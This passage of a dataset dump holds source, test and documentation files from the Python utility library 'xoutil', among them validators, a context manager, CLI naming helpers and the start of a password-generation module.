"116c4c248f65460f379f9a872e4363f8e0130a7d", "content_id": "bbdf66539d2028de791532947c211722cbf13e8f", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 207, "license_type": "permissive", "max_line_length": 70, "num_lines": 3, "path": "/docs/source/history/_changes-1.8.6.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Fix bug #24: `~xoutil.future.datetime.TimeSpan`:class: should always\n return a `datetime.date`:class: for its `start_date` and `end_date`\n attribute. Even if initialized with `datetime.datetime`:class:\n" }, { "alpha_fraction": 0.6861538290977478, "alphanum_fraction": 0.744615375995636, "avg_line_length": 45.42856979370117, "blob_id": "7b98ece47b65c0c7fa39b55eadd868d59ef89c36", "content_id": "237a2c29894d6fe54b281aff8ace7ad42bf6440f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 325, "license_type": "no_license", "max_line_length": 86, "num_lines": 7, "path": "/xotl/tools/reprlib.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "# Back-ported from Python 3.2.\n# Copyright (c) 2001-2012, 2014-2016, Python Software Foundation; All rights reserved.\n# Retains the licence of the Python Software Foundation.\n# flake8: noqa\n\"\"\"Redo the builtin repr() (representation) but with limits on most sizes.\"\"\"\n\nfrom reprlib import Repr, repr, recursive_repr, __all__\n" }, { "alpha_fraction": 0.4647963345050812, "alphanum_fraction": 0.4960884749889374, "avg_line_length": 32.09821319580078, "blob_id": "6a039f5656d33eb0862b784941917b129b34aa74", "content_id": "f59a94d18e595c8c94572ed754038c5897cf4f1d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3708, "license_type": "no_license", "max_line_length": 75, "num_lines": 112, "path": "/tests/test_clisp.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\nimport unittest\n\n\nclass TestCLisp(unittest.TestCase):\n def test_basic_coercers(self):\n from xoutil.values import (\n identity_coerce,\n void_coerce,\n coercer,\n vouch,\n t,\n int_coerce,\n float_coerce,\n create_int_range_coerce,\n istype,\n typecast,\n iterable,\n mapping,\n create_unique_member_coerce,\n nil,\n )\n\n d = {\"1\": 2, 3.0: \"4\", 5.0 + 0j: 7.3 + 0j, 1: \"2\"}\n s = {1, \"2\", 3.0, \"1\"}\n l = [1, \"2\", 3.0, \"1\", \"x10\"]\n number_types = (int, float, complex)\n mc = mapping(int_coerce, float_coerce)\n uint_coerce = create_unique_member_coerce(int_coerce, d)\n mcu = mapping(uint_coerce, float_coerce)\n ic = iterable(int_coerce)\n age_coerce = create_int_range_coerce(0, 100)\n text_coerce = coercer(str)\n isnumber = istype(number_types)\n numbercast = typecast(number_types)\n # TODO: don't use isinstance\n self.assertEqual(\n all(\n isinstance(c, coercer)\n for c in (\n mc,\n mcu,\n uint_coerce,\n ic,\n age_coerce,\n text_coerce,\n identity_coerce,\n void_coerce,\n int_coerce,\n float_coerce,\n )\n ),\n True,\n )\n self.assertEqual(mc(dict(d)), {1: 2.0, 3: 4.0, 5: 7.3})\n self.assertIs(mcu(d), nil)\n self.assertEqual(mcu.scope, ({\"1\": 2}, uint_coerce))\n self.assertEqual(ic(s), {1, 2, 3})\n self.assertIs(ic(l), nil)\n self.assertIs(ic.scope, l[-1])\n self.assertEqual(l, [1, 2, 3, 1, \"x10\"])\n self.assertIs(age_coerce(80), 80)\n self.assertFalse(t(age_coerce(120)))\n self.assertIs(vouch(age_coerce, 80), 80)\n with self.assertRaises(TypeError):\n vouch(age_coerce, 120)\n self.assertIs(isnumber(5), 5)\n self.assertIs(isnumber(5.1), 5.1)\n with self.assertRaises(TypeError):\n vouch(isnumber, \"5.1\")\n self.assertIs(numbercast(5), 5)\n self.assertIs(numbercast(5.1), 5.1)\n self.assertEqual(numbercast(\"5.1\"), 5.1)\n self.assertIs(numbercast.scope, float)\n\n def test_compound_coercers(self):\n from xoutil.values import (\n coercer,\n compose,\n some,\n combo,\n iterable,\n typecast,\n int_coerce,\n float_coerce,\n nil,\n )\n\n isstr = coercer(str)\n strcast = typecast(str)\n toint = compose(isstr, int_coerce)\n isint = some(isstr, int_coerce)\n hyphenjoin = coercer(lambda arg: \"-\".join(arg))\n intjoin = compose(iterable(strcast), hyphenjoin)\n cb = combo(strcast, int_coerce, float_coerce)\n self.assertEqual(toint(\"10\"), 10)\n self.assertIs(toint(10), nil)\n self.assertEqual(toint.scope, (10, isstr))\n self.assertEqual(isint(\"10\"), \"10\")\n self.assertEqual(isint.scope, isstr)\n self.assertEqual(isint(10), 10)\n self.assertEqual(isint.scope, int_coerce)\n self.assertEqual(intjoin(2 * i + 1 for i in range(5)), \"1-3-5-7-9\")\n self.assertEqual(cb([1, \"2.0\", 3, 4]), [\"1\", 2, 3.0])\n" }, { "alpha_fraction": 0.46464645862579346, "alphanum_fraction": 0.46464645862579346, "avg_line_length": 38.599998474121094, "blob_id": "e99e1d4557fd5b64afd553aef4969ee5b0cbfcfa", "content_id": "4455086e30cc6e11422fc9e5bf75869a16eb86cb", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 198, "license_type": "permissive", "max_line_length": 72, "num_lines": 5, "path": "/docs/source/xotl.tools/values/ids.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "`xotl.tools.values.ids`:mod: -- unique identifiers at different contexts\n========================================================================\n\n.. automodule:: xotl.tools.values.ids\n :members:\n" }, { "alpha_fraction": 0.6573875546455383, "alphanum_fraction": 0.6573875546455383, "avg_line_length": 26.47058868408203, "blob_id": "cf5f209fd7613aff993b5ae0bc650dc0908e7dab", "content_id": "84bfb54b78fcb51a19ade327662c2533a809502f", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 467, "license_type": "permissive", "max_line_length": 78, "num_lines": 17, "path": "/docs/source/xotl.tools/infinity.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "`xotl.tools.infinity`:mod: - An infinite value\n==============================================\n\n.. module:: xotl.tools.infinity\n\n.. data:: Infinity\n\n The positive infinite value. The negative infinite value is ``-Infinity``.\n\n These values are only sensible for comparison. Arithmetic is not\n supported.\n\n The type of values that is comparable with `Infinity`:obj: is controlled by\n the ABC `InfinityComparable`:class:.\n\n\n.. autoclass:: InfinityComparable\n" }, { "alpha_fraction": 0.5823702812194824, "alphanum_fraction": 0.5883752703666687, "avg_line_length": 28.518394470214844, "blob_id": "95671b504ded87bd18f3630ce6b67664b308582d", "content_id": "fecb64dc90889b25754e43833d37bdf37adecfe8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8828, "license_type": "no_license", "max_line_length": 78, "num_lines": 299, "path": "/xotl/tools/validators/__init__.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"Some generic value validators and regular expressions and validation\nfunctions for several identifiers.\n\n\"\"\"\n\n\n# TODO: Check next import, it looks like one of the modules must be deprecated\nfrom xotl.tools.validators.identifiers import ( # noqa\n is_valid_identifier,\n check_identifier,\n is_valid_full_identifier,\n is_valid_public_identifier,\n is_valid_slug,\n)\n\n\ndef _adorn_checker_name(name):\n \"\"\"Make more attractive or legible a checker name.\"\"\"\n res = name.replace(\"_AND_\", \" & \")\n res = res.replace(\"_OR_\", \" | \")\n return res.replace(\"<lambda>\", \"<λ>\")\n\n\ndef _get_checker_name(checker):\n \"\"\"Return a nice name for a `checker`.\n\n A `checker` could be a type, a tuple of types, a callable or a list of\n other checkers.\n\n \"\"\"\n l = lambda o: str(\"(%s)\" % o.join(_get_checker_name(c) for c in checker))\n if isinstance(checker, list):\n return l(\"_AND_\")\n elif isinstance(checker, tuple):\n return l(\"_OR_\")\n else:\n from xotl.tools.future.inspect import safe_name\n\n res = safe_name(checker, affirm=True)\n if not isinstance(checker, type):\n assert callable(checker)\n if \"lambda\" in res:\n from inspect import getargspec\n\n args = getargspec(checker).args\n assert len(args) == 1\n res = str(\"%s(%s)\" % (res, args[0]))\n return res\n\n\ndef is_type(cls):\n \"\"\"Return a validator with the same name as the type given as argument\n `value`.\n\n :param cls: Class or type or tuple of several types.\n\n \"\"\"\n\n def inner(obj):\n \"\"\"Check is a value object is a valid instance of (%s).\"\"\"\n return isinstance(obj, cls)\n\n name = _get_checker_name(cls)\n inner.__name__ = name\n inner.__doc__ = inner.__doc__ % name\n return inner\n\n\n# TODO: With this new function, `is_type` could be deprecated\n# TODO: Migrate to a class\ndef predicate(*checkers, **kwargs):\n \"\"\"Return a validation checker for types and simple conditions.\n\n :param checkers: A variable number of checkers; each one could be:\n\n - A type, or tuple of types, to test valid values with\n ``isinstance(value, checker)``\n\n - A set or mapping of valid values, the value is valid if contained in\n the checker.\n\n - A tuple of other inner checkers, if any of the checkers validates a\n value, the value is valid (OR).\n\n - A list of other inner checkers, all checkers must validate the value\n (AND).\n\n - A callable that receives the value and returns True if the value is\n valid.\n\n - ``True`` and ``False`` could be used as checkers always validating\n or invalidating the value.\n\n An empty list or no checker is synonym of ``True``, an empty tuple,\n set or mapping is synonym of ``False``.\n\n :param name: Keyword argument to be used in case of error; will be the\n argument of `ValueError` exception; could contain the placeholders\n ``{value}`` and ``{type}``; a default value is used if this argument\n is not given.\n\n :param force_name: Keyword argument to force a name if not given.\n\n In order to obtain good documentations, use proper names for functions and\n lambda arguments.\n\n With this function could be built real type checkers, for example::\n\n >>> is_valid_age = predicate((int, float), lambda age: 0 < age <= 120)\n >>> is_valid_age(100)\n True\n\n >>> is_valid_age(130)\n False\n\n >>> always_true = predicate(True)\n >>> always_true(False)\n True\n\n >>> always_false = predicate(False)\n >>> always_false(True)\n False\n\n >>> always_true = predicate()\n >>> always_true(1)\n True\n\n >>> always_true('any string')\n True\n\n >>> always_false = predicate(())\n >>> always_false(1)\n False\n\n >>> always_false('any string')\n False\n\n \"\"\"\n from xotl.tools.symbols import boolean\n from xotl.tools.future.collections import Set, Mapping\n\n def inner(obj):\n \"\"\"Check is `obj` is a valid instance for a set of checkers.\"\"\"\n\n def valid(chk):\n if isinstance(chk, boolean):\n res = bool(chk)\n elif isinstance(chk, type):\n res = isinstance(obj, chk)\n elif isinstance(chk, tuple):\n if all(isinstance(c, type) for c in chk):\n res = isinstance(obj, chk)\n else:\n res = any(valid(c) for c in chk)\n elif isinstance(chk, list):\n res = all(valid(c) for c in chk)\n elif isinstance(chk, (Set, Mapping)):\n res = obj in chk\n else:\n res = chk(obj)\n return res\n\n # XXX: WTF, must be ``all(valid(chk) for chk in checkers)``\n return next((chk for chk in checkers if not valid(chk)), None) is None\n\n name = kwargs.get(\"name\")\n if name is None and kwargs.get(\"force_name\"):\n name = _get_checker_name(list(checkers))\n if name is not None:\n inner.__name__ = name\n return inner\n\n\ndef check(value, validator, msg=None):\n \"\"\"Check a `value` with a `validator`.\n\n Argument `validator` could be a callable, a type, or a tuple of types.\n\n Return True if the value is valid.\n\n Examples::\n\n >>> check(1, int)\n True\n\n >>> check(10, lambda x: x <= 100, 'must be less than or equal to 100')\n True\n\n >>> check(11/2, (int, float))\n True\n\n \"\"\"\n if isinstance(validator, (type, tuple)):\n checker = is_type(validator)\n else:\n checker = validator\n if checker(value):\n return True\n else:\n from xotl.tools.future.inspect import safe_name\n\n if not msg:\n # TODO: Use the name of validator with `inspect.getattr_static`\n # when `xotl.tools.future` is ready\n msg = 'Invalid value \"%s\" of type \"%s\"'\n msg = msg.format(value=value, type=safe_name(value, affirm=True))\n raise ValueError(msg)\n\n\n# TODO: deprecate `check` in favor of `ok`.\ndef ok(value, *checkers, **kwargs):\n \"\"\"Validate a value with several checkers.\n\n Return the value if it is Ok, or raises an `ValueError` exception if not.\n\n Arguments:\n\n :param value: the value to validate\n\n :param checkers: a variable number of checkers (at least one), each one\n could be a type, a tuple of types of a callable that receives the\n value and returns if the value is valid or not. In order the value is\n considered valid, all checkers must validate the value.\n\n :param message: keyword argument to be used in case of error; will be the\n argument of `ValueError` exception; could contain the placeholders\n ``{value}`` and ``{type}``; a default value is used if this\n argument is not given.\n\n :param msg: an alias for \"message\"\n\n :param extra_checkers: In order to create validators using `partial`.\n Must be a tuple.\n\n Keyword arguments are not validated to be correct.\n\n This function could be used with type-definitions for arguments, see\n `xotl.tools.fp.prove.semantic.TypeCheck`:class:.\n\n Examples::\n\n >>> ok(1, int)\n 1\n\n >>> ok(10, int, lambda x: x < 100, message='Must be integer under 100')\n 10\n\n >>> ok(11/2, (int, float))\n 5.5\n\n >>> ok(11/2, int, float)\n 5.5\n\n >>> try:\n ... res = ok(11/2, int)\n ... except ValueError:\n ... res = '---'\n >>> res\n '---'\n\n \"\"\"\n extra_checkers = kwargs.get(\"extra_checkers\", ())\n pred = predicate(*(checkers + extra_checkers))\n if pred(value):\n return value\n else:\n from xotl.tools.future.itertools import multi_get as get\n from xotl.tools.future.inspect import safe_name\n\n msg = next(get(kwargs, \"message\", \"msg\"), \"Invalid {type}: {value}!\")\n msg = msg.format(value=value, type=safe_name(value, affirm=True))\n raise ValueError(msg)\n\n\ndef check_no_extra_kwargs(kwargs):\n \"\"\"Check that no extra keyword arguments are still not processed.\n\n For example::\n\n >>> from xotl.tools.validators import check_no_extra_kwargs\n >>> def only_safe_arg(**kwargs):\n ... safe = kwargs.pop('safe', False)\n ... check_no_extra_kwargs(kwargs)\n ... print('OK for safe:', safe)\n\n \"\"\"\n if kwargs:\n plural = \"\" if len(kwargs) == 1 else \"s\"\n msg = 'Unexpected keyword argument%s: \"%s\"!'\n raise TypeError(msg % (plural, \", \".join(kwargs)))\n" }, { "alpha_fraction": 0.5723556280136108, "alphanum_fraction": 0.5736534595489502, "avg_line_length": 26.51785659790039, "blob_id": "1333ad9e43da628beb6657a10c15fb2dd538ced8", "content_id": "d82cea2efd6f90ddbd40706c2012f07694f884d8", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 1541, "license_type": "permissive", "max_line_length": 77, "num_lines": 56, "path": "/docs/source/xotl.tools/fp/tools.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "==============================================================\n `xotl.tools.fp.tools`:mod: -- High-level pure function tools\n==============================================================\n\n.. automodule:: xotl.tools.fp.tools\n\n.. class:: compose(*funcs)\n\n Composition of several functions.\n\n Functions are composed right to left. A composition of zero functions\n gives back the `identity`:func: function.\n\n Rules must be fulfilled (those inner `all`)::\n\n >>> x = 15\n >>> f, g, h = x.__add__, x.__mul__, x.__xor__\n >>> all((compose() is identity,\n ...\n ... # identity functions are optimized\n ... compose(identity, f, identity) is f,\n ...\n ... compose(f) is f,\n ... compose(g, f)(x) == g(f(x)),\n ... compose(h, g, f)(x) == h(g(f(x)))))\n True\n\n If any \"intermediate\" function returns an instance of:\n\n - `pos_args`:class:\\ : it's expanded as variable positional arguments to\n the next function.\n\n - `kw_args`:class:\\ : it's expanded as variable keyword arguments to the\n next function.\n\n - `full_args`:class:\\ : it's expanded as variable positional and keyword\n arguments to the next function.\n\n The expected usage of these is **not** to have function return those types\n directly, but to use them when composing functions that return tuples and\n expect tuples.\n\n\n.. autofunction:: identity\n\n.. autofunction:: fst\n\n.. autofunction:: snd\n\n.. autofunction:: constant\n\n.. autoclass:: pos_args\n\n.. autoclass:: kw_args\n\n.. autoclass:: full_args\n" }, { "alpha_fraction": 0.5555198788642883, "alphanum_fraction": 0.560815155506134, "avg_line_length": 25.978355407714844, "blob_id": "77f95b60dcc077090312c81f8d24a990d3c5112b", "content_id": "d9551f3202b1c9ccca86451c5a351b4414bd2940", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6233, "license_type": "no_license", "max_line_length": 79, "num_lines": 231, "path": "/xotl/tools/context.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"A context manager for execution context flags.\"\"\"\n\nfrom xotl.tools.tasking import local\nfrom xotl.tools.future.collections import StackedDict, Mapping\n\n__all__ = (\"Context\", \"context\", \"NullContext\")\n\n\nclass LocalData(local):\n \"\"\"Thread-local data for contexts.\"\"\"\n\n def __init__(self):\n super().__init__()\n self.contexts = {}\n\n\n_data = LocalData()\n\n\nclass MetaContext(type(StackedDict)): # type: ignore\n def __len__(self):\n return len(_data.contexts)\n\n def __iter__(self):\n return iter(_data.contexts)\n\n def __getitem__(self, name):\n return _data.contexts.get(name, _null_context)\n\n def __contains__(self, name):\n \"\"\"Basic support for the 'A in context' idiom.\"\"\"\n return bool(self[name])\n\n\nclass Context(StackedDict, metaclass=MetaContext):\n \"\"\"An execution context manager with parameters (or flags).\n\n Use as::\n\n >>> SOME_CONTEXT = object()\n >>> from xotl.tools.context import context\n >>> with context(SOME_CONTEXT):\n ... if context[SOME_CONTEXT]:\n ... print('In context SOME_CONTEXT')\n In context SOME_CONTEXT\n\n Note the difference creating the context and checking it: for entering a\n context you should use ``context(name)`` for testing whether some piece of\n code is being executed inside a context you should use ``context[name]``;\n you may also use the syntax `name in context`.\n\n When an existing context is re-enter, the former one is reused.\n Nevertheless, the data stored in each context is local to each level.\n\n For example::\n\n >>> with context('A', b=1) as a1:\n ... with context('A', b=2) as a2:\n ... print(a1 is a2)\n ... print(a2['b'])\n ... print(a1['b'])\n True\n 2\n 1\n\n For data access, a mapping interface is provided for all contexts. If a\n data slot is deleted at some level, upper level is used to read\n values. Each new written value is stored in current level without\n affecting upper levels.\n\n For example::\n\n >>> with context('A', b=1) as a1:\n ... with context('A', b=2) as a2:\n ... del a2['b']\n ... print(a2['b'])\n 1\n\n It is an error to *reuse* a context directly like in::\n\n >>> with context('A', b=1) as a1: # doctest: +ELLIPSIS\n ... with a1:\n ... pass\n Traceback (most recent call last):\n ...\n RuntimeError: Entering the same context level twice! ...\n\n \"\"\"\n\n __slots__ = (\"name\", \"count\")\n\n def __new__(cls, name, **data):\n self = cls[name]\n if not self: # if self is _null_context:\n self = super().__new__(cls)\n super(Context, self).__init__()\n self.name = name\n self.count = 0\n # TODO: Redefine all event management\n return self(**data)\n\n @classmethod\n def from_dicts(cls, ctx, overrides=None, defaults=None):\n \"\"\"Creates a context introducing both defaults and overrides.\n\n This combines both the standard constructor and `from_defaults`:meth:.\n\n If the same key appears in both `overrides` and `defaults`, ignore the\n default.\n\n \"\"\"\n if not overrides:\n overrides = {}\n if not defaults:\n defaults = {}\n current = cls[ctx]\n current_attrs = dict(current) if current else {}\n attrs = dict(defaults, **current_attrs)\n attrs.update(overrides)\n return cls(ctx, **attrs)\n\n @classmethod\n def from_defaults(cls, ctx, **defaults):\n \"\"\"Creates context `ctx` introducing only new keys given in `defaults`.\n\n The normal behavior when you enter a new level in the context is to\n override the values with the new one.\n\n Example:\n\n >>> with context.from_defaults('A', a=1):\n ... with context.from_defaults('A', a=2, b=1) as c:\n ... assert c['a'] == 1\n\n \"\"\"\n return cls.from_dicts(ctx, defaults=defaults)\n\n def __init__(self, *args, **kwargs):\n \"\"\"Must be defined empty for `__new__` parameters compatibility.\n\n Using generic parameters definition allow any redefinition of this\n class can use this `__init__`.\n\n \"\"\"\n\n def __call__(self, **data):\n \"\"\"Allow re-enter in a new level to an already assigned context.\"\"\"\n self.push_level(**data)\n return self\n\n def __nonzero__(self):\n return bool(self.count)\n\n __bool__ = __nonzero__\n\n def __enter__(self):\n if self.count == 0:\n _data.contexts[self.name] = self\n if self.count + 1 == self.level:\n self.count += 1\n return self\n else:\n msg = \"Entering the same context level twice! -- c(%s, %d, %d)\"\n raise RuntimeError(msg % (self.name, self.count, self.level))\n\n def __exit__(self, exc_type, exc_value, traceback):\n self.count -= 1\n if self.count == 0:\n del _data.contexts[self.name]\n self.pop_level()\n return False\n\n\n# A simple alias for Context\ncontext = Context\n\n\nclass NullContext(Mapping):\n \"\"\"Singleton context to be used (returned) as default when no one is\n defined.\n\n \"\"\"\n\n __slots__ = ()\n\n instance = None\n name = \"\"\n\n def __new__(cls):\n if cls.instance is None:\n cls.instance = super().__new__(cls)\n return cls.instance\n\n def __len__(self):\n return 0\n\n def __iter__(self):\n return iter(())\n\n def __getitem__(self, key):\n raise KeyError(key)\n\n def __nonzero__(self):\n return False\n\n __bool__ = __nonzero__\n\n def __enter__(self):\n return _null_context\n\n def __exit__(self, exc_type, exc_value, traceback):\n return False\n\n def get(self, name, default=None):\n return default\n\n @property\n def level(self):\n return 0\n\n\n_null_context = NullContext()\n" }, { "alpha_fraction": 0.46341463923454285, "alphanum_fraction": 0.4674796760082245, "avg_line_length": 17.923076629638672, "blob_id": "cc411f5ab3b73ddb454fd70ad6b55fb8fb15ca26", "content_id": "b63dfcdbfa6c58a5edcb64f7fd9aff8efbb75734", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 246, "license_type": "permissive", "max_line_length": 66, "num_lines": 13, "path": "/docs/source/xotl.tools/values.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "`xotl.tools.values`:mod: -- coercers (or checkers) for value types\n==================================================================\n\n.. automodule:: xotl.tools.values\n :members:\n\nContents:\n\n.. toctree::\n :maxdepth: 1\n :glob:\n\n values/*\n" }, { "alpha_fraction": 0.704081654548645, "alphanum_fraction": 0.7346938848495483, "avg_line_length": 48, "blob_id": "fa2b37e9bceaa32a1a6a72787c96b4c0bcaded51", "content_id": "46c8e3e123a1b8c2afbaab096bdcf32a4905f868", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 98, "license_type": "permissive", "max_line_length": 71, "num_lines": 2, "path": "/docs/source/history/_changes-1.8.8.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Fix bug #28: `xoutil.future.inspect.getattr_static`:func: failed with\n Python's 2 old classes.\n" }, { "alpha_fraction": 0.5452355742454529, "alphanum_fraction": 0.5532655119895935, "avg_line_length": 27.961240768432617, "blob_id": "e83d687e24c0f7f8784316dcfda3c6b938fa6f70", "content_id": "0a420c7c56c42b80c0c4890fb5ec31c13520b586", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3739, "license_type": "no_license", "max_line_length": 78, "num_lines": 129, "path": "/xotl/tools/cli/tools.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\nr\"\"\"Utilities for command-line interface (CLI) applications.\n\n- `program_name`:func:\\ : calculate the program name from \"sys.argv[0]\".\n\n- `command_name`:func:\\ : calculate command names using class names in lower\n case inserting a hyphen before each new capital letter.\n\n\"\"\"\n\n\ndef hyphen_name(name, join_numbers=True):\n \"\"\"Convert a name to a hyphened slug.\n\n Expects a `name` in Camel-Case. All invalid characters (those invalid in\n Python identifiers) are ignored. Numbers are joined with preceding part\n when `join_numbers` is True.\n\n For example::\n\n >>> hyphen_name('BaseNode') == 'base-node'\n True\n\n >> hyphen_name('--__ICQNámeP12_34Abc--') == 'icq-name-p12-34-abc'\n True\n\n >> hyphen_name('ICQNámeP12', join_numbers=False) == 'icq-name-p-12'\n True\n\n \"\"\"\n import re\n from xotl.tools.string import force_ascii\n\n name = force_ascii(name)\n regex = re.compile(\"[^A-Za-z0-9]+\")\n name = regex.sub(\"-\", name)\n regex = re.compile(\"([A-Z]+|[a-z]+|[0-9]+|-)\")\n all = regex.findall(name)\n i, count, parts = 0, len(all), []\n while i < count:\n part = all[i]\n if part != \"-\":\n upper = \"A\" <= part <= \"Z\"\n if upper:\n part = part.lower()\n j = i + 1\n if j < count and upper and \"a\" <= all[j] <= \"z\":\n aux = part[:-1]\n if aux:\n parts.append(aux)\n part = part[-1] + all[j]\n i = j\n j += 1\n if j < count and \"0\" <= all[j] <= \"9\" and join_numbers:\n part = part + all[j]\n i = j\n parts.append(part)\n i += 1\n return \"-\".join(parts)\n\n\ndef program_name():\n \"\"\"Calculate the program name from \"sys.argv[0]\".\"\"\"\n # TODO: Use 'argparse' standard (parser.prog)\n import sys\n from os.path import basename\n\n return basename(sys.argv[0])\n\n\ndef command_name(cls):\n \"\"\"Calculate a command name from given class.\n\n Names are calculated putting class names in lower case and inserting\n hyphens before each new capital letter. For example \"MyCommand\" will\n generate \"my-command\".\n\n It's defined as an external function because a class method don't apply to\n minimal commands (those with only the \"run\" method).\n\n Example::\n\n >>> class SomeCommand:\n ... pass\n\n >>> command_name(SomeCommand) == 'some-command'\n True\n\n If the command class has an attribute `command_cli_name`, this will be\n used instead::\n\n >>> class SomeCommand:\n ... command_cli_name = 'adduser'\n\n >>> command_name(SomeCommand) == 'adduser'\n True\n\n It's an error to have a non-string `command_cli_name` attribute::\n\n >>> class SomeCommand:\n ... command_cli_name = None\n\n >>> command_name(SomeCommand) # doctest: +ELLIPSIS\n Traceback (most recent call last):\n ...\n TypeError: Attribute 'command_cli_name' must be a string.\n\n \"\"\"\n unset = object()\n names = (\"command_cli_name\", \"__command_name__\")\n i, res = 0, unset\n while i < len(names) and res is unset:\n name = names[i]\n res = getattr(cls, names[i], unset)\n if res is unset:\n i += 1\n elif not isinstance(res, str):\n raise TypeError(\"Attribute '{}' must be a string.\".format(name))\n if res is unset:\n res = hyphen_name(cls.__name__)\n return res\n" }, { "alpha_fraction": 0.6408554315567017, "alphanum_fraction": 0.6476770043373108, "avg_line_length": 31.479042053222656, "blob_id": "85da3f9192576a316ec2ec93cb27b5f077c44d8f", "content_id": "c48f27518341ee9fba0ac593fe179d00fb002f88", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5425, "license_type": "no_license", "max_line_length": 78, "num_lines": 167, "path": "/xotl/tools/crypto.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"General security tools.\n\nAdds the ability to generate new passwords using a source pass-phrase and a\nsecury strong level.\n\n\"\"\"\n\n\n__all__ = (\n \"PASS_PHRASE_LEVEL_BASIC\",\n \"PASS_PHRASE_LEVEL_MAPPED\",\n \"PASS_PHRASE_LEVEL_MAPPED_MIXED\",\n \"PASS_PHRASE_LEVEL_MAPPED_DATED\",\n \"PASS_PHRASE_LEVEL_STRICT\",\n \"generate_password\",\n)\n\n\n#: The most basic level (less ) for the password generation.\nPASS_PHRASE_LEVEL_BASIC = 0\n\n#: A level for simply mapping of several chars.\nPASS_PHRASE_LEVEL_MAPPED = 1\n\n#: Another \"stronger\" mapping level.\nPASS_PHRASE_LEVEL_MAPPED_MIXED = 2\n\n#: Appends the year after mapping.\nPASS_PHRASE_LEVEL_MAPPED_DATED = 3\n\n#: Totally scramble the result, making very hard to predict the result.\nPASS_PHRASE_LEVEL_STRICT = 4\n\n#: The default level for `generate_password`:func:\nDEFAULT_PASS_PHRASE_LEVEL = PASS_PHRASE_LEVEL_MAPPED_DATED\n\n\n#: A mapping from names to standards levels. You may use these strings as\n#: arguments for `level` in `generate_password`:func:.\nPASS_LEVEL_NAME_MAPPING = {\n \"basic\": PASS_PHRASE_LEVEL_BASIC,\n \"mapped\": PASS_PHRASE_LEVEL_MAPPED,\n \"mixed\": PASS_PHRASE_LEVEL_MAPPED_MIXED,\n \"dated\": PASS_PHRASE_LEVEL_MAPPED_DATED,\n \"random\": PASS_PHRASE_LEVEL_STRICT,\n}\n\n\nBASIC_PASSWORD_SIZE = 4 # bytes\n\n#: An upper limit for generated password length.\nMAX_PASSWORD_SIZE = 512\n\n\nSAMPLE = \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789\"\n\n\ndef _normalize_level(level):\n \"\"\"Normalize the `level` argument.\n\n If passed a string, it must be a key in `PASS_LEVEL_NAME_MAPPING`:obj:.\n Otherwise it must be a valid level number.\n\n \"\"\"\n if isinstance(level, str):\n return PASS_LEVEL_NAME_MAPPING[level]\n else:\n return level\n\n\ndef generate_password(pass_phrase, level=DEFAULT_PASS_PHRASE_LEVEL):\n \"\"\"Generate a password from a source `pass-phrase` and a security `level`.\n\n :param pass_phrase: String pass-phrase to be used as base of password\n generation process.\n\n :param level: Numerical security level (the bigger the more secure, but\n don't exaggerate!).\n\n When `pass_phrase` is a valid string, `level` means a generation method.\n Each level implies all other with an inferior numerical value.\n\n There are several definitions with numerical values for `level` (0-4):\n\n 